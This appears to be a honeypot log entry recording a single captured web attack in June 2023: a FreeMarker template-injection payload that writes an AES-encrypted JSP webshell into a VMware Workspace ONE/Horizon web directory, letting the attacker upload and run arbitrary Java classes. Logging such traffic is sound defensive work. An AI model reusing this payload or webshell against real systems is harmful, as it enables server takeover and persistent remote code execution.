Attack 1bf28587-6b2f-4133-8811-4b89ef58ec3d
Details
| ID |
1bf28587-6b2f-4133-8811-4b89ef58ec3d |
| Attack Type |
elasticsearch |
| IP Address |
75.127.11.24 |
| Username |
|
| Password |
|
| Client Version |
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40 |
| Country |
United States |
| Date |
2023-06-04 08:48PM |
Request Data
{
"path": "",
"method": "GET",
"headers": {
"Accept": "*/*",
"Connection": "keep-alive",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40",
"Accept-Encoding": "gzip, deflate"
},
"hostname": "localhost",
"form_data": {
"code": "",
"deviceUdid": "${\"freemarker.template.utility.ObjectConstructor\"?new()(\"java.io.FileOutputStream\",\"/opt/vmware/horizon/workspace/webapps/SAAS/jersey/manager/api/images/2907/Wx0qSGH.jsp\").write(\"freemarker.template.utility.ObjectConstructor\"?new()(\"java.lang.String\",\"\n <%@page import=\\\"java.util.*,javax.crypto.*,javax.crypto.spec.*\\\"%>\n <%!\n class U extends ClassLoader{\n U(ClassLoader c) {\n super(c);\n }\n \n public Class g(byte []b) {\n return super.defineClass(b,0,b.length);\n }\n }%><%\n if (request.getMethod().equals(\\\"POST\\\")){\n String k=\\\"e45e329feb5d925b\\\";\n session.putValue(\\\"u\\\",k);\n Cipher c=Cipher.getInstance(\\\"AES\\\");\n c.init(2,new SecretKeySpec(k.getBytes(),\\\"AES\\\"));\n new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}\n %>\n <%out.println(\\\"e8418d1d706cd73548f9f16f1d55ad6e\\\") ;%>\").getBytes())}"
}
}